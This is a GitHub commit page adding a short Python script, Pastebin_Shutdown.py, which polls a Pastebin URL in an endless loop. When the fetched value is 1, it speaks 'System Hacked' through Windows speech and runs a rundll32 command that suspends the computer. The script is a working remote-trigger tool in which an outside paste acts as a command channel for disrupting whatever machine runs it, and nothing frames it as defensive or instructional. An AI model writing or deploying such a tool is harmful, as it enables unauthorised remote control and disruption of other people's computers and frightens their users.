Skip to content

Commit ffbc1ac

Browse files
authored
Add files via upload
1 parent 4f04fff commit ffbc1ac

File tree

1 file changed

+17
-0
lines changed

1 file changed

+17
-0
lines changed

Pastebin_Shutdown.py

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
import win32com.client as client
2+
import bs4 as bs
3+
from urllib import request
4+
import os
5+
6+
while True:
7+
sauce = request.urlopen('https://pastebin.com/raw/MuS8ZYiX')
8+
soup = bs.BeautifulSoup(sauce,"lxml")
9+
print(soup.text)
10+
command = int(soup.text)
11+
12+
speak = client.Dispatch("SAPI.SpVoice")
13+
if command==1:
14+
speak.Speak("System Hacked")
15+
os.system("rundll32.exe powrprof.dll,SetSuspendState 0,1,0")
16+
else:
17+
pass

0 commit comments

Comments
 (0)